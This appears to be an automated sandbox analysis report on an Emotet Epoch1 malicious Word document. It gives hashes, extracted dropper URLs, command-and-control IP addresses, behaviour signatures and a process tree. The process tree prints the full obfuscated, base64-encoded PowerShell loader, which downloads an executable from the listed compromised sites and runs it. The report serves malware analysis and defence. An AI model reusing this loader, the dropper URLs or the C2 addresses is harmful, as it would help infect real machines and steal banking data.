emotet | 75fc337dd52e7d9cd46cb3a7938551eeefc05a67075a62e6442a0b6501c4fd0a

General

Target

emotet_e1_75fc337dd52e7d9cd46cb3a7938551eeefc05a67075a62e6442a0b6501c4fd0a_2020-10-29__125734253876._doc.doc
Size

288KB
MD5

04d224ec52eb178906699f26756254fa
SHA1

b9387fc3417846ce5f567e258644b6b45d7c135e
SHA256

75fc337dd52e7d9cd46cb3a7938551eeefc05a67075a62e6442a0b6501c4fd0a
SHA512

2916a9630eb386bd6694d456c47c8b173289fd866a4787d25b3fd8b7906f5670c14eea5f1b13a283772d28c9159ba1c8bde03c8f97826c0b83b52527a45b4e8d

Score

10^/10

emotet epoch1 banker trojan

Malware Config

Extracted

Language

ps1

Source

URLs

exe.dropper

http://innhanmachn.com/wp-admin/sA/

exe.dropper

http://shomalhouse.com/wp-includes/ID3/IDz/

exe.dropper

http://blog.martyrolnick.com/wp-admin/Spq/

exe.dropper

https://www.frajamomadrid.com/wp-content/g/

exe.dropper

https://pesquisacred.com/vmware-unlocker/daC/

exe.dropper

https://medhempfarm.com/wp-admin/Lb/

exe.dropper

http://ienglishabc.com/cow/2BB/

Extracted

Family

emotet

Botnet

Epoch1

C2

192.198.91.138:443

70.39.251.94:8080

87.230.25.43:8080

94.23.62.116:8080

128.92.203.42:80

2.45.176.233:80

202.134.4.210:7080

46.101.58.37:8080

12.163.208.58:80

200.24.255.23:80

76.121.199.225:80

186.193.229.123:80

190.24.243.186:80

201.71.228.86:80

188.251.213.180:80

201.49.239.200:443

104.131.41.185:8080

172.104.169.32:8080

37.187.161.206:8080

70.32.84.74:8080

rsa_pubkey.plain

Signatures

Emotet
Emotet is a trojan that is primarily spread through spam emails.
trojan banker emotet

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

POwersheLL.exe

description	pid	pid_target	process	target process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3528	3884	POwersheLL.exe

Emotet Payload 4 IoCs

Detects Emotet payload in memory.

Processes:

resource	yara_rule
behavioral2/memory/2628-14-0x0000000002800000-0x0000000002812000-memory.dmp	emotet
behavioral2/memory/2628-15-0x0000000002190000-0x00000000021A0000-memory.dmp	emotet
behavioral2/memory/1660-18-0x00000000020E0000-0x00000000020F2000-memory.dmp	emotet
behavioral2/memory/1660-19-0x0000000002100000-0x0000000002110000-memory.dmp	emotet

Blacklisted process makes network request 2 IoCs

Processes:

POwersheLL.exe

flow pid process

19 3528 POwersheLL.exe
21 3528 POwersheLL.exe
Executes dropped EXE 2 IoCs

Processes:

N1pjur3u.exeusp10.exe

pid process

2628 N1pjur3u.exe
1660 usp10.exe
Drops file in System32 directory 1 IoCs

Processes:

N1pjur3u.exe

description ioc process

File opened for modification C:\Windows\SysWOW64\gcdef\usp10.exe N1pjur3u.exe

flow	pid	process
19	3528	POwersheLL.exe
21	3528	POwersheLL.exe

pid	process
2628	N1pjur3u.exe
1660	usp10.exe

description	ioc	process
File opened for modification	C:\Windows\SysWOW64\gcdef\usp10.exe	N1pjur3u.exe

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

WINWORD.EXE

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WINWORD.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WINWORD.EXE

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

WINWORD.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WINWORD.EXE

Modifies data under HKEY_USERS 1 IoCs

Processes:

svchost.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\NGC\SoftLockoutVolatileKey svchost.exe
Suspicious behavior: AddClipboardFormatListener 2 IoCs

Processes:

WINWORD.EXE

pid process

3240 WINWORD.EXE
3240 WINWORD.EXE
Suspicious behavior: EnumeratesProcesses 7 IoCs

Processes:

POwersheLL.exeusp10.exe

pid process

3528 POwersheLL.exe
3528 POwersheLL.exe
3528 POwersheLL.exe
1660 usp10.exe
1660 usp10.exe
1660 usp10.exe
1660 usp10.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

POwersheLL.exe

description pid process

Token: SeDebugPrivilege 3528 POwersheLL.exe
Suspicious use of SetWindowsHookEx 9 IoCs

Processes:

WINWORD.EXEN1pjur3u.exeusp10.exe

pid process

3240 WINWORD.EXE
3240 WINWORD.EXE
3240 WINWORD.EXE
3240 WINWORD.EXE
3240 WINWORD.EXE
3240 WINWORD.EXE
3240 WINWORD.EXE
2628 N1pjur3u.exe
1660 usp10.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\NGC\SoftLockoutVolatileKey	svchost.exe

pid	process
3240	WINWORD.EXE
3240	WINWORD.EXE

pid	process
3528	POwersheLL.exe
3528	POwersheLL.exe
3528	POwersheLL.exe
1660	usp10.exe
1660	usp10.exe
1660	usp10.exe
1660	usp10.exe

description	pid	process
Token: SeDebugPrivilege	3528	POwersheLL.exe

pid	process
3240	WINWORD.EXE
3240	WINWORD.EXE
3240	WINWORD.EXE
3240	WINWORD.EXE
3240	WINWORD.EXE
3240	WINWORD.EXE
3240	WINWORD.EXE
2628	N1pjur3u.exe
1660	usp10.exe

Suspicious use of WriteProcessMemory 3 IoCs

Processes:

N1pjur3u.exe

description	pid	process	target process
PID 2628 wrote to memory of 1660	2628	N1pjur3u.exe	usp10.exe
PID 2628 wrote to memory of 1660	2628	N1pjur3u.exe	usp10.exe
PID 2628 wrote to memory of 1660	2628	N1pjur3u.exe	usp10.exe

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\emotet_e1_75fc337dd52e7d9cd46cb3a7938551eeefc05a67075a62e6442a0b6501c4fd0a_2020-10-29__125734253876._doc.doc" /o ""
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:3240

C:\Windows\System32\WindowsPowerShell\v1.0\POwersheLL.exe
POwersheLL -ENCOD JAAxAEQAMgAgACAAPQBbAHQAWQBwAEUAXQAoACIAewAzAH0AewAxAH0AewA0AH0AewA1AH0AewAwAH0AewAyAH0AIgAtAGYAIAAnAGUAYwBUAG8AJwAsACcAUwB0AGUATQAuACcALAAnAFIAeQAnACwAJwBzAHkAJwAsACcASQBvAC4AJwAsACcAZABpAFIAJwApADsAIAAgACAAIAAkAHQASgA4AG0ANABCACAAPQBbAFQAWQBwAGUAXQAoACIAewAyAH0AewA0AH0AewA1AH0AewAxAH0AewAzAH0AewAwAH0AIgAtAGYAIAAnAHIAJwAsACcAaQBOAFQAbQBBAG4AQQBnACcALAAnAHMAWQBzAHQAZQBNAC4AbgBFACcALAAnAGUAJwAsACcAVAAnACwAJwAuAFMAZQByAFYASQBjAEUAcABPACcAKQAgADsAIAAgACQAWQBzAGEAMgAxADIAZwA9ACgAJwBOACcAKwAoACcAYgA3AGkAYgAwACcAKwAnADAAJwApACkAOwAkAFMAOQA1AGMAegAzADQAPQAkAEkAMABwAGgAcwBkAGsAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAEkAeABkAGIAeAB0AG8AOwAkAFEAZABmAGcAMgBjAHAAPQAoACgAJwBDAGgAbgBzACcAKwAnADcAJwApACsAJwAyACcAKwAnAGQAJwApADsAIAAgACgAZABJAFIAIAB2AGEAcgBpAEEAQgBsAGUAOgAxAEQAMgApAC4AdgBhAGwAdQBFADoAOgAiAEMAUgBgAGUAQQB0AGUARABpAHIAYABlAGMAdABvAHIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAoACcAOABVACcAKwAnAEwAJwApACsAKAAnAFAAagAnACsAJwBxACcAKQArACgAJwA2AHQAMwAnACsAJwBfADgAVQBMACcAKwAnAEoAdgBuACcAKwAnAGsAJwApACsAKAAnADcAJwArACcAeQBrACcAKQArACgAJwA4AFUAJwArACcATAAnACkAKQAuACIAUgBgAGUAYABwAGwAYQBjAGUAIgAoACgAJwA4ACcAKwAnAFUATAAnACkALAAnAFwAJwApACkAKQA7ACQAUQBvADAAOABqAGMAaQA9ACgAJwBGACcAKwAnADUAJwArACgAJwBvAGMAeAAnACsAJwBlAHgAJwApACkAOwAgACgAIAAgAEkAVABFAE0AIAAgAHYAQQBSAEkAQQBiAGwARQA6AFQAagA4AE0ANABCACAAKQAuAFYAQQBsAFUAZQA6ADoAIgBTAGUAQwBgAFUAYABSAEkAYABUAHkAUABSAG8AVABPAGMAYABPAEwAIgAgAD0AIAAoACgAJwBUAGwAJwArACcAcwAxACcAKQArACcAMgAnACkAOwAkAFIANwB3ADAANQAzAGkAPQAoACgAJwBOAHUAZQAnACsAJwBsADIAJwApACsAJwA0ACcAKwAnAGsAJwApADsAJABUAGUAZABiAHIAMAAwACAAPQAgACgAJwBOACcAKwAnADEAcAAnACsAKAAnAGoAdQByACcAKwAnADMAdQAnACkAKQA7ACQASABfADgAeQBuAGkAMAA9ACgAJwBKADYAJwArACcAYQAnACsAKAAnAGYAJwArACcAZgB2ADYAJwApACkAOwAkAFIAbwB6ADAAOQBkAHAAPQAoACcAVgAnACsAKAAnAHQAOQAnACsAJwAxAG8AcABoACcAKQApADsAJABHAGwAawB2AGYANwBiAD0AJABIAE8ATQBFACsAKAAoACcAewAwACcAKwAnAH0AUABqAHEANgAnACsAJwB0ACcAKwAnADMAXwAnACsAJwB7ADAAJwArACcAfQBKAHYAbgBrADcAeQBrAHsAMAB9ACcAKQAgAC0ARgBbAEMAaABhAHIAXQA5ADIAKQArACQAVABlAGQAYgByADAAMAArACgAJwAuAGUAJwArACcAeABlACcAKQA7ACQAQQBkAHMANABtAHgAZwA9ACgAKAAnAEUAJwArACcAMgBuACcAKQArACcAMABqACcAKwAnAHEAbwAnACkAOwAkAFEANABiADEAZwA1AG4APQAuACgAJwBuAGUAdwAtAG8AJwArACcAYgAnACsAJwBqAGUAYwAnACsAJwB0ACcAKQAgAG4ARQB0AC4AVwBFAEIAYwBMAGkAZQBOAHQAOwAkAEIAbwBpAGUAcAAwADEAPQAoACgAKAAnAGgAdAAnACsAJwB0AHAAOgBdAFsAJwArACcAIAAnACkAKwAnADEAJwArACgAKAAnACkAIAAnACkAKQArACcAagBqACcAKwAoACgAJwBrAGcAUwAgAFsAXQAgAFsAXQB3ACcAKwAnAF0AWwAnACsAJwAgADEAKQAnACsAJwAgACcAKQApACsAKAAnAGoAagAnACsAJwBrAGcAUwAgAFsAXQAnACkAKwAoACcAIABbAF0AdwBpACcAKwAnAG4AbgBoACcAKQArACgAJwBhAG4AbQBhACcAKwAnAGMAaABuAC4AJwApACsAKAAoACcAYwBvAG0AXQAnACsAJwBbACAAMQApACAAJwApACkAKwAnAGoAJwArACgAJwBqAGsAZwBTACcAKwAnACAAWwBdACcAKQArACgAJwAgAFsAXQAnACsAJwB3ACcAKQArACcAdwBwACcAKwAoACcALQAnACsAJwBhAGQAbQAnACkAKwAoACgAJwBpAG4AXQBbACAAJwArACcAMQApACcAKwAnACAAagAnACkAKQArACgAJwBqACcAKwAnAGsAZwAnACkAKwAoACcAUwAgAFsAXQAnACsAJwAgAFsAXQAnACkAKwAnAHcAJwArACgAJwBzAEEAJwArACcAXQAnACkAKwAnAFsAJwArACgAKAAnACAAMQAnACsAJwApACAAagBqAGsAZwAnACsAJwBTACcAKQApACsAJwAgACcAKwAnAFsAJwArACgAJwBdACAAJwArACcAWwAnACkAKwAnAF0AdwAnACsAJwBAAGgAJwArACgAKAAnAHQAdABwADoAJwArACcAXQAnACsAJwBbACAAJwArACcAMQApACAAagBqACcAKQApACsAKAAnAGsAJwArACcAZwBTACAAJwApACsAKAAnAFsAXQAnACsAJwAgACcAKQArACcAWwAnACsAJwBdACcAKwAoACgAJwB3AF0AWwAnACsAJwAgADEAKQAnACkAKQArACgAJwAgAGoAJwArACcAagAnACkAKwAoACcAawBnAFMAIABbAF0AJwArACcAIABbAF0AJwArACcAdwBzAGgAJwApACsAJwBvAG0AJwArACcAYQBsACcAKwAoACcAaABvAHUAcwBlACcAKwAnAC4AYwBvACcAKQArACgAJwBtAF0AJwArACcAWwAnACkAKwAnACAAMQAnACsAKAAoACcAKQAnACsAJwAgAGoAagBrAGcAJwApACkAKwAoACcAUwAgACcAKwAnAFsAXQAnACkAKwAoACcAIABbAF0AdwB3AHAALQAnACsAJwBpAG4AJwArACcAYwAnACsAJwBsAHUAJwApACsAJwBkAGUAJwArACgAJwBzACcAKwAnAF0AWwAnACkAKwAnACAAMQAnACsAKAAoACcAKQAgACcAKQApACsAKAAnAGoAJwArACcAagBrACcAKQArACcAZwAnACsAJwBTACAAJwArACgAJwBbAF0AJwArACcAIABbACcAKQArACgAJwBdAHcAJwArACcASQAnACkAKwAoACcARAAzACcAKwAnAF0AWwAnACkAKwAnACAAMQAnACsAJwApACcAKwAoACcAIABqAGoAawAnACsAJwBnACcAKQArACgAJwBTACAAJwArACcAWwBdACcAKQArACcAIAAnACsAKAAoACcAWwAnACsAJwBdAHcASQAnACsAJwBEAHoAXQBbACAAMQApACcAKQApACsAKAAnACAAagBqAGsAZwAnACsAJwBTACcAKQArACcAIAAnACsAKAAnAFsAXQAgACcAKwAnAFsAJwArACcAXQB3AEAAaAAnACkAKwAoACcAdAB0AHAAJwArACcAOgBdACcAKwAnAFsAIAAnACkAKwAoACgAJwAxACkAJwApACkAKwAoACcAIAAnACsAJwBqAGoAawBnAFMAIAAnACsAJwBbAF0AIAAnACkAKwAoACcAWwBdACcAKwAnAHcAXQBbACcAKQArACgAKAAnACAAJwArACcAMQApACcAKQApACsAKAAnACAAJwArACcAagBqAGsAJwApACsAKAAnAGcAJwArACcAUwAgAFsAXQAnACkAKwAoACcAIABbACcAKwAnAF0AJwApACsAJwB3AGIAJwArACcAbABvACcAKwAoACcAZwAnACsAJwAuAG0AYQAnACkAKwAoACcAcgAnACsAJwB0AHkAcgAnACkAKwAoACcAbwBsACcAKwAnAG4AaQAnACkAKwAoACcAYwBrAC4AJwArACcAYwBvAG0AJwApACsAJwBdACcAKwAoACcAWwAnACsAJwAgADEAJwApACsAKAAoACcAKQAnACsAJwAgAGoAJwApACkAKwAnAGoAawAnACsAKAAnAGcAUwAnACsAJwAgAFsAXQAgACcAKwAnAFsAJwApACsAKAAnAF0AdwB3AHAAJwArACcALQAnACsAJwBhAGQAbQAnACkAKwAoACcAaQBuACcAKwAnAF0AJwApACsAKAAoACcAWwAgADEAKQAgACcAKwAnAGoAagAnACkAKQArACcAawAnACsAKAAnAGcAUwAgAFsAJwArACcAXQAgACcAKQArACgAJwBbACcAKwAnAF0AdwBTACcAKQArACgAJwBwAHEAXQAnACsAJwBbACAAMQAnACkAKwAoACgAJwApACAAJwApACkAKwAnAGoAJwArACcAagBrACcAKwAoACcAZwBTACAAWwBdACAAWwBdACcAKwAnAHcAJwArACcAQABoAHQAdAAnACkAKwAnAHAAJwArACcAcwA6ACcAKwAnAF0AJwArACgAKAAnAFsAIAAnACsAJwAxACkAIABqACcAKwAnAGoAawBnAFMAIAAnACkAKQArACcAWwBdACcAKwAnACAAJwArACgAJwBbACcAKwAnAF0AdwBdACcAKQArACcAWwAnACsAJwAgADEAJwArACgAKAAnACkAIAAnACkAKQArACcAagBqACcAKwAoACcAawBnAFMAIABbAF0AIABbACcAKwAnAF0AdwB3AHcAdwAnACsAJwAuAGYAJwApACsAJwByACcAKwAoACcAYQBqAGEAbQBvAG0AJwArACcAYQBkACcAKwAnAHIAaQAnACsAJwBkAC4AYwAnACsAJwBvAG0AJwApACsAKAAnAF0AJwArACcAWwAgADEAJwApACsAKAAoACcAKQAgAGoAJwArACcAagAnACkAKQArACcAawBnACcAKwAnAFMAIAAnACsAKAAnAFsAXQAgAFsAJwArACcAXQB3ACcAKQArACgAJwB3AHAAJwArACcALQAnACkAKwAoACcAYwBvAG4AdAAnACsAJwBlACcAKQArACgAJwBuAHQAJwArACcAXQAnACkAKwAnAFsAIAAnACsAJwAxACcAKwAoACgAJwApACcAKwAnACAAagAnACkAKQArACgAJwBqAGsAJwArACcAZwAnACkAKwAnAFMAJwArACgAJwAgAFsAJwArACcAXQAnACkAKwAoACcAIAAnACsAJwBbAF0AdwBnAF0AJwApACsAKAAoACcAWwAgADEAKQAnACsAJwAgAGoAJwArACcAagBrAGcAJwApACkAKwAnAFMAIAAnACsAKAAnAFsAXQAnACsAJwAgACcAKQArACgAJwBbACcAKwAnAF0AdwBAAGgAJwApACsAJwB0AHQAJwArACgAKAAnAHAAJwArACcAcwA6ACcAKwAnAF0AWwAgADEAJwArACcAKQAgACcAKwAnAGoAagBrACcAKwAnAGcAUwAgAFsAXQAgACcAKQApACsAKAAnAFsAXQB3AF0AWwAnACsAJwAgACcAKQArACgAKAAnADEAKQAnACsAJwAgACcAKQApACsAKAAnAGoAagBrAGcAJwArACcAUwAgAFsAJwArACcAXQAnACkAKwAnACAAWwAnACsAJwBdAHcAJwArACgAJwBwACcAKwAnAGUAcwBxAHUAaQAnACkAKwAoACcAcwAnACsAJwBhAGMAJwApACsAJwByAGUAJwArACcAZAAnACsAKAAoACcALgAnACsAJwBjAG8AbQBdAFsAIAAxACkAIABqAGoAJwArACcAawAnACkAKQArACcAZwAnACsAJwBTACAAJwArACcAWwBdACcAKwAoACcAIABbAF0AdwAnACsAJwB2AG0AdwAnACkAKwAoACcAYQByACcAKwAnAGUALQB1AG4AbAAnACkAKwAoACcAbwBjAGsAJwArACcAZQAnACkAKwAoACcAcgAnACsAJwBdAFsAIAAxACcAKQArACgAKAAnACkAIAAnACkAKQArACgAJwBqACcAKwAnAGoAawAnACkAKwAnAGcAJwArACgAJwBTACAAWwAnACsAJwBdACAAJwApACsAKAAnAFsAJwArACcAXQB3ACcAKQArACcAZABhACcAKwAnAEMAJwArACcAXQAnACsAJwBbACcAKwAoACgAJwAgACcAKwAnADEAKQAgACcAKwAnAGoAagAnACkAKQArACgAJwBrAGcAJwArACcAUwAnACkAKwAnACAAJwArACgAJwBbAF0AJwArACcAIAAnACkAKwAnAFsAXQAnACsAJwB3ACcAKwAnAEAAJwArACgAJwBoAHQAJwArACcAdABwACcAKQArACcAcwA6ACcAKwAnAF0AWwAnACsAKAAoACcAIAAxACkAJwArACcAIAAnACkAKQArACcAagAnACsAJwBqACcAKwAoACcAawAnACsAJwBnAFMAJwApACsAKAAnACAAWwAnACsAJwBdACcAKQArACgAJwAgAFsAJwArACcAXQAnACkAKwAoACcAdwBdAFsAIAAnACsAJwAxACcAKQArACcAKQAnACsAJwAgACcAKwAoACcAagBqACcAKwAnAGsAZwBTACAAJwApACsAJwBbACcAKwAoACcAXQAnACsAJwAgAFsAXQB3AG0AZQAnACkAKwAnAGQAJwArACgAJwBoACcAKwAnAGUAbQAnACkAKwAoACgAJwBwAGYAYQAnACsAJwByAG0ALgBjACcAKwAnAG8AbQBdACcAKwAnAFsAIAAxACkAJwApACkAKwAnACAAJwArACgAJwBqAGoAJwArACcAawBnACcAKQArACgAJwBTACcAKwAnACAAWwBdACAAWwAnACkAKwAoACcAXQB3AHcAcAAnACsAJwAtAGEAJwApACsAJwBkAG0AJwArACgAJwBpAG4AJwArACcAXQAnACkAKwAnAFsAJwArACcAIAAnACsAJwAxACcAKwAoACgAJwApACAAagBqAGsAZwBTACAAWwAnACsAJwBdACcAKwAnACAAWwBdAHcAJwArACcATAAnACkAKQArACcAYgAnACsAKAAoACcAXQBbACAAMQAnACsAJwApACAAagBqACcAKQApACsAKAAnAGsAJwArACcAZwBTACcAKwAnACAAWwBdACcAKQArACcAIAAnACsAJwBbAF0AJwArACcAdwAnACsAJwBAAGgAJwArACgAJwB0ACcAKwAnAHQAcAA6AF0AWwAgADEAJwApACsAJwApACcAKwAoACcAIABqACcAKwAnAGoAawBnAFMAIABbAF0AJwArACcAIAAnACkAKwAnAFsAJwArACgAJwBdAHcAXQAnACsAJwBbACcAKQArACgAKAAnACAAMQAnACsAJwApACcAKQApACsAKAAnACAAJwArACcAagBqACcAKQArACgAJwBrAGcAJwArACcAUwAgAFsAXQAnACsAJwAgAFsAXQAnACkAKwAnAHcAJwArACgAJwBpAGUAbgAnACsAJwBnACcAKQArACgAJwBsAGkAJwArACcAcwBoAGEAJwApACsAJwBiAGMAJwArACgAJwAuAGMAJwArACcAbwAnACkAKwAoACgAJwBtAF0AWwAnACsAJwAgADEAKQAnACsAJwAgAGoAJwApACkAKwAoACcAagBrACcAKwAnAGcAUwAnACkAKwAoACgAJwAgACcAKwAnAFsAXQAnACsAJwAgAFsAJwArACcAXQB3AGMAJwArACcAbwB3AF0AWwAgADEAJwArACcAKQAgACcAKQApACsAJwBqAGoAJwArACcAawAnACsAKAAnAGcAUwAnACsAJwAgACcAKQArACcAWwAnACsAJwBdACcAKwAoACcAIAAnACsAJwBbAF0AJwApACsAKAAnAHcAMgBCACcAKwAnAEIAJwApACsAKAAoACcAXQBbACAAJwArACcAMQApACcAKQApACsAJwAgACcAKwAnAGoAJwArACgAJwBqAGsAJwArACcAZwAnACkAKwAoACcAUwAgACcAKwAnAFsAXQAgACcAKQArACcAWwBdACcAKwAnAHcAJwApACkALgAiAFIAYABlAHAAYABsAGEAYwBFACIAKAAoACgAJwBdAFsAJwArACgAKAAnACAAJwArACcAMQApACAAagBqAGsAZwAnACsAJwBTACAAWwBdACcAKQApACsAJwAgACcAKwAoACcAWwBdACcAKwAnAHcAJwApACkAKQAsACgAWwBhAHIAcgBhAHkAXQAoACcALwAnACkALAAoACcAeAAnACsAJwB3AGUAJwApACkAWwAwAF0AKQAuACIAUwBgAFAAbABpAFQAIgAoACQATwBkADcAYwBjAHcAOQAgACsAIAAkAFMAOQA1AGMAegAzADQAIAArACAAJABPAG4ANQA1AGwAagBnACkAOwAkAFEAOQBlAGMAYwBjADUAPQAoACgAJwBGACcAKwAnAG8ANAAnACkAKwAnAGcAJwArACgAJwAyACcAKwAnAHIAawAnACkAKQA7AGYAbwByAGUAYQBjAGgAIAAoACQAUwA3AG0AXwBiAHMAaAAgAGkAbgAgACQAQgBvAGkAZQBwADAAMQApAHsAdAByAHkAewAkAFEANABiADEAZwA1AG4ALgAiAGQAYABvAFcAbgBMAGAATwBhAGAARABmAEkAbABFACIAKAAkAFMANwBtAF8AYgBzAGgALAAgACQARwBsAGsAdgBmADcAYgApADsAJABFADQAZgBrAHQAZQBhAD0AKAAnAEQAJwArACcAbABpACcAKwAoACcAMAAnACsAJwA0AG4AXwAnACkAKQA7AEkAZgAgACgAKAAmACgAJwBHAGUAdAAnACsAJwAtAEkAdABlACcAKwAnAG0AJwApACAAJABHAGwAawB2AGYANwBiACkALgAiAGwAYABlAGAATgBnAHQAaAAiACAALQBnAGUAIAA0ADcAOQAxADIAKQAgAHsAKABbAHcAbQBpAGMAbABhAHMAcwBdACgAJwB3AGkAJwArACgAJwBuACcAKwAnADMAMgAnACkAKwAnAF8AUAAnACsAKAAnAHIAJwArACcAbwBjAGUAcwBzACcAKQApACkALgAiAEMAUgBgAGUAYABBAHQARQAiACgAJABHAGwAawB2AGYANwBiACkAOwAkAEsAbABtAG0AbABjAHIAPQAoACgAJwBWADYAegAnACsAJwA0ADMAJwArACcAcQAnACkAKwAnAGQAJwApADsAYgByAGUAYQBrADsAJABNAHkAcwBlADgAcAB0AD0AKAAnAFMAOAAnACsAKAAnADIANgA2AGoAJwArACcANwAnACkAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAWAB3AG4AZgA5AGIANQA9ACgAJwBSAF8AJwArACgAJwAxAGsAbAAnACsAJwB3ACcAKQArACcAbwAnACkA
1⤵
- Process spawned unexpected child process
- Blacklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3528

C:\Users\Admin\Pjq6t3_\Jvnk7yk\N1pjur3u.exe
C:\Users\Admin\Pjq6t3_\Jvnk7yk\N1pjur3u.exe
1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2628

C:\Windows\SysWOW64\gcdef\usp10.exe
"C:\Windows\SysWOW64\gcdef\usp10.exe"
2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:1660

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s NgcSvc
1⤵
PID:3340

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s DeviceAssociationService
1⤵
PID:2240

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s NgcCtnrSvc
1⤵
- Modifies data under HKEY_USERS
PID:744

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

2

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\Pjq6t3_\Jvnk7yk\N1pjur3u.exe
MD5
e35c8103f924210d388d02edec91ff1c

SHA1
a2436b72d49bc344ac3f0226f09aa34f9e2b2f8a

SHA256
c63eef43cec61412ba12f6c405faad6a697ad134edd7375bafd47a759bd352cb

SHA512
ef54e996cbc0a95353f4014858aa1d707786c175a0a60d1ec6d7c8f587e48385d367b333fccb9dbd6648367c2bc8165a411f056245f121e40af02d995bdb6971

Download Submit
C:\Users\Admin\Pjq6t3_\Jvnk7yk\N1pjur3u.exe
MD5
e35c8103f924210d388d02edec91ff1c

SHA1
a2436b72d49bc344ac3f0226f09aa34f9e2b2f8a

SHA256
c63eef43cec61412ba12f6c405faad6a697ad134edd7375bafd47a759bd352cb

SHA512
ef54e996cbc0a95353f4014858aa1d707786c175a0a60d1ec6d7c8f587e48385d367b333fccb9dbd6648367c2bc8165a411f056245f121e40af02d995bdb6971

Download Submit
C:\Windows\SysWOW64\gcdef\usp10.exe
MD5
e35c8103f924210d388d02edec91ff1c

SHA1
a2436b72d49bc344ac3f0226f09aa34f9e2b2f8a

SHA256
c63eef43cec61412ba12f6c405faad6a697ad134edd7375bafd47a759bd352cb

SHA512
ef54e996cbc0a95353f4014858aa1d707786c175a0a60d1ec6d7c8f587e48385d367b333fccb9dbd6648367c2bc8165a411f056245f121e40af02d995bdb6971

Download Submit
memory/1660-19-0x0000000002100000-0x0000000002110000-memory.dmp

Filesize
64KB

Download
memory/1660-18-0x00000000020E0000-0x00000000020F2000-memory.dmp

Filesize
72KB

Download
memory/1660-16-0x0000000000000000-mapping.dmp

Download
memory/2628-15-0x0000000002190000-0x00000000021A0000-memory.dmp

Filesize
64KB

Download
memory/2628-14-0x0000000002800000-0x0000000002812000-memory.dmp

Filesize
72KB

Download
memory/3240-4-0x0000022A0D82C000-0x0000022A0D8C4000-memory.dmp

Filesize
608KB

Download
memory/3240-5-0x0000022A0D741000-0x0000022A0D744000-memory.dmp

Filesize
12KB

Download
memory/3240-0-0x00007FFD84C20000-0x00007FFD85257000-memory.dmp

Filesize
6.2MB

Download
memory/3240-3-0x0000022A0D82C000-0x0000022A0D8C4000-memory.dmp

Filesize
608KB

Download
memory/3240-2-0x0000022A0D82C000-0x0000022A0D8C4000-memory.dmp

Filesize
608KB

Download
memory/3240-1-0x0000022A0D82C000-0x0000022A0D8C4000-memory.dmp

Filesize
608KB

Download
memory/3528-11-0x0000021D623B0000-0x0000021D623B1000-memory.dmp

Filesize
4KB

Download
memory/3528-10-0x0000021D4A1F0000-0x0000021D4A1F1000-memory.dmp

Filesize
4KB

Download
memory/3528-9-0x00007FFD7E3E0000-0x00007FFD7EDCC000-memory.dmp

Filesize
9.9MB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads